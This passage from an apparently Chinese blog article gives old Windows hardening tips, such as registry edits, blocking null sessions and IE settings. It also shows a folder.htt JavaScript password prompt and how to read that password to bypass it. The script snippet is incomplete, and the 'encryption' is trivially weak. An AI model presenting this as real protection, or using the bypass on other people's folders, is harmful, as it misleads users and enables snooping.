  虽然我们将其关闭了,高超的黑客有时还会主动将其打开,所以我们要在注册表中进行修改,禁止别人更改“Microsoft网络的文件和打印机共享”。打开注册表编辑器(运行Regedit.exe),进入到 HKEY_CURRENT_USER/Software/Microsoft/Windows/Curr-entVersion/Policies/NetWork主键下,在该主键下新建DWORD类型的键值,键值名为NoFileSharingControl,键值为十六进制的“1”表示禁止这项功能,从而达到禁止更改“Microsoft网络的文件和打印机共享”的目的;键值为十六进制的“0”表示允许这项功能

3.禁止建立空连接

 

  在默认的情况下,任何用户都可以通过空连接连上服务器,枚举帐号并猜测密码。因此我们必须禁止建立空连接。方法有以下两种:方法一是修改注册表:到注册表 HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/LSA下,将DWORD值RestrictAnonymous的键值改为1即可。方法二是修改Windows 2000/XP的本地安全策略为“不允许SAM帐户和共享的匿名枚举”。

  4.关闭不必要的服务

  服务开得多可以给管理带来方便,但也会给黑客留下可乘之机,因此对于一些确实用不到的服务,最好关掉。比如在不需要远程管理计算机时,我都会将有关远程网络登录的服务关掉。去掉不必要的服务停止之后,不仅能保证系统的安全,同时还可以提高系统运行速度。

  六、做好IE的安全设置

  ActiveX控件和Java Applets有较强的功能,但也存在被人利用的隐患,网页中的恶意代码往往就是利用这些控件编写的小程序,只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择,具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”,建议您将ActiveX控件与Java相关选项禁用。谨慎些总没有错!   

  另外,在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过,微软在这里隐藏了“我的电脑”的安全性设定,通过修改注册表把该选项打开,可以使我们在对待ActiveX控件和Java Applets时有更多的选择,并对本地电脑安全产生更大的影响。

  下面是具体的方法:打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe,打开注册表编辑器,点击前面的“+”号顺次展开到:HKEY_CURRE-NT_USER/Software/Microsoft/Windows/CurrentVersion/InternetSettings/Zones/0,在右边窗口中找到DWORD值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标,在这里你可以设定它的安全等级。将它的安全等级设定高些,这样的防范更严密。

七、安装必要的安全软件

  我们还应在电脑中安装并使用必要的防黑软件,杀毒软件和防火墙都是必备的。在上网时打开它们,这样即便有黑客进攻我们的安全也是有保证的。

  八、防范木马程序

  木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被黑客植入木马程序,常用的办法有:

  ● 在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。

  ● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目,如果有,删除即可。

  ● 将注册表里 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run下的所有以“Run”为前缀的可疑程序全部删除即可。

  九、不要回陌生人的邮件

  有些黑客可能会冒充某些正规网站的名义,然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码,如果按下“确定”,你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件,即使他说得再动听再诱人也不上当。

  十、及时给系统打补丁

  最后,建议大家到微软的站点下载自己的操作系统对应的补丁程序,微软不断推出的补丁尽管让人厌烦,但却是我们网络安全的基础。

保全个人隐私 Windows系统文件夹加解密技巧
面对一成不变的Windows文件夹,大家有没有想过让其个性化些?如何让你文件夹里的信息更安全?如何让你文件夹使用起来更方便呢?本文中笔者将给大家介绍这方面的技巧,一定会让你的系统看起来更加有个性,使用更方便,信息更安全,今天我们刊登出加解密篇。
  加密:每个人都有一些不希望别人看到的东西,例如学习计划、情书等等,大家都喜欢把它们放在一个文件夹里,虽然可以采用某些工具软件给文件夹加密,但那样太麻烦了,有没有什么简单的方法可以为自己的文件夹设定一个密码呢?答案是肯定的,利用Windows自带功能我们就能轻松的为文件夹设定密码。

  1.在Windows 9X/Me/2000中

  进入要加密的文件夹,点击右键,在弹出的菜单中选择“自定义文件夹“。接下来在向导中点击“下一步”,选择“自定义”并勾选“选择或编辑该文件夹的Html模板”,在模板类型中选择“标准”,并选中“编辑该模板”,点击下一步(在Win98中稍有不同,直接在向导中选择“创建或编辑HTML文档”即可)。此时将会打开一个名为“Folder”的文本文件。在该文件中找到<script language="JavaScript">字段,在其下方输入以下内容(中文双引号内为注释内容,不需要输入):

  var pass=prompt("Please Enter the Password");“prompt命令后的括号内输入进入文件夹后的提示用语,可以为中文。分号可省略。可此行必须单独一行”

  if(pass!="123")“密码为123,也可以设置为其他密码”

  “若密码错误,则进入C盘,也可以设为别的分区,但是只能为根目录”

  保存后退出该文件设置便可以起效。folder.htt文件在创建后,下次需要更改设置我们就可以直接在文件夹中找到folder.htt文件,用记事本打开后进行修改,保存后设置即可生效。若是在WinMe操作系统,则没有<script language="JavaScript">字段,我们要找的字段是<script>,把上面的内容放在该字段后即可。

  2.在Windows XP中

  在Windows XP中的“自定义文件夹”中没有相应的选项对模板进行编辑,而且直接编辑其中的folder.htt文件也无效。这时候我们可以“曲线救国”:先在Windows2000中按以上方式建立一个加密的文件夹,然后把该文件夹整体复制到Windows XP中即可。

  通过以上的方法,我们可以完成对私人文件夹的加密。虽然比较简单,但是也能起到一定的作用,特别是对于那些无意窥视他人隐私的人来讲。

  解密:

  当然,以上的加密是非常脆弱的,下面我就向大家介绍一下如何对此类文件夹进行解密操作,当你在加密后却忘记了密码的时候,就能派上用场了。当然,可不能利用这个去做坏事哦。

  方法一(适用于Windows98/Me系统):进入一个未加密的文件夹,点击菜单栏上的“查看”命令,取消“按Web页查看”选项。再次点击“查看”,选择“文件夹选项”,在弹出的对话框中选择“查看”选项卡。点击“与当前文件夹类似”,确定后即可取消本机上所有文件夹的加密。

  方法二:采用方法一将会取消对所有已加密文件夹的加密属性,无法对单个文件夹进行解密操作,而且不适用于Win2000、XP系统。其实,不管是在98系统还是2000/XP系统下,破解这种类型的加密文件夹有一个通用的方法,我们甚至可以像进入自己的文件夹那样进入到加密的文件夹:假设被加密的文件夹为d:/lj,那么只需要在地址栏中输入d:/lj/folder settings/folder.htt,就可以打开改设置文件(folder.htt)。我们只要在改文件中找到进行加密的几行代码,密码就毫无保留的呈现在了我们面前。记下了密码,再打开加密的文件夹,我们就可以轻松进入了! 

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页